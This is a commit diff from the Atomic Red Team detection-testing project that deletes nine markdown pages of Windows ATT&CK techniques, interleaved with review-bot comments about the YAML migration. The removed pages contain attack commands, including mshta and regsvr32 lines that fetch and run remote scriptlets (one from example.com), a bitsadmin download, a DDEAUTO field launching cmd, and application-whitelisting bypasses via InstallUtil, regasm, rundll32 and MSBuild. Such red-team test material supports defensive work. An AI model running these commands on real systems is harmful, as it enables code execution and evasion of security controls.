delete yamlized things

caseysmithrc
2018-05-23 20:02:58 -06:00
parent 05022acaa9
commit 9985eef477
9 changed files with 0 additions and 135 deletions
@@ -1,11 +0,0 @@
## BITS Jobs
MITRE ATT&CK Technique: [T1197](https://attack.mitre.org/wiki/Technique/T1197)
### bitsadmin.exe
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
### PowerShell
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
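Review bot: Both commands in this removed file use https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md as the download source. If that path is among the nine files deleted by this commit, any YAML test that carried the URL over unchanged will fail once this lands. Point the replacement test at a file that stays on master, or confirm that it already does.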
@@ -1,15 +0,0 @@
## CMSTP
MITRE ATT&CK Technique: [T1191](https://attack.mitre.org/wiki/Technique/T1191)
### Scriptlet execution
Local:
cmstp.exe /s CMSTP.inf
## Test Script
[CMSTP.INF](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.inf)
[CMSTP.SCT](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/CMSTP.sct)
@@ -1,19 +0,0 @@
# Dynamic Data Exchange
MITRE ATT&CK Technique: [T1173](https://attack.mitre.org/wiki/Technique/T1173)
### Microsoft Word
Open,
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.
The Field Code should now be displayed, change it to Contain the following:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
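Review bot: The Microsoft Word steps in this file, from "Insert tab -> Quick Parts -> Field" through "Toggle Field Codes", are manual GUI actions with no command line, so they are the content most likely to be lost in a YAML conversion. Before deleting, confirm that the YAML entry for T1173 keeps these steps and the DDEAUTO field code as a manual test.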
@@ -1,15 +0,0 @@
## InstallUtil
MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118)
### Execution Examples:
Input:
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U InstallUtilBypass.dll
## Test Script
[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs)
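Review bot: Missing build step: the two InstallUtil.exe lines run InstallUtilBypass.dll, but the only payload linked under "Test Script" is the source file InstallUtilBypass.cs, and nothing in the file says how the DLL is produced from it. Check that the YAML replacement documents the compile step or ships the built DLL, otherwise the test cannot be run from the instructions alone.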
@@ -1,12 +0,0 @@
## Mshta
MITRE ATT&CK Technique: [T1170](https://attack.mitre.org/wiki/Technique/T1170)
### Example Execution:
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
## Test Script
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/mshta.sct").Exec();close();
[mshta.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct)
@@ -1,22 +0,0 @@
## Regsvcs/Regasm
MITRE ATT&CK Technique: [T1121](https://attack.mitre.org/wiki/Technique/T1121)
### Execution Examples:
[DLL](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
Input:
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
## Test Script
[RegSvcsRegAsmBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs)
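Review bot: Payload mismatch: all four regsvcs.exe and regasm.exe lines load AllTheThings.dll, while the "Test Script" link points to RegSvcsRegAsmBypass.cs. Make sure the YAML replacement settles on one payload and that the file it names is the one the commands actually load. Also confirm it keeps all four variants (x86 and x64, regsvcs without /U and regasm with /U).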
@@ -1,16 +0,0 @@
## Regsvr32
MITRE ATT&CK Technique: [T1117](https://attack.mitre.org/wiki/Technique/T1117)
### Local Scriptlet Execution:
regsvr32.exe /s /u /i:file.sct scrobj.dll
### Remote Scriptlet Exection:
regsvr32.exe /s /u /i:http://example.com/file.sct scrobj.dll
## Test Script
[regsvr32.sct](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvr32.sct)
@@ -1,13 +0,0 @@
## Rundll32
MITRE ATT&CK Technique: [T1085](https://attack.mitre.org/wiki/Technique/T1085)
### Executes an export inside of a dll.
rundll32 AllTheThings.dll,EntryPoint
## Test Script
[AlltheThings.dll](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/AllTheThings)
@@ -1,12 +0,0 @@
## Trusted Developer Utilities
MITRE ATT&CK Technique: [T1127](https://attack.mitre.org/wiki/Technique/T1127)
### MSBuild.exe - [Inline Tasks](https://msdn.microsoft.com/en-us/library/dd722601.aspx)
C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe File.csproj
## Test Script
[MSBuildBypass.csproj](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/MSBuildBypass.csproj)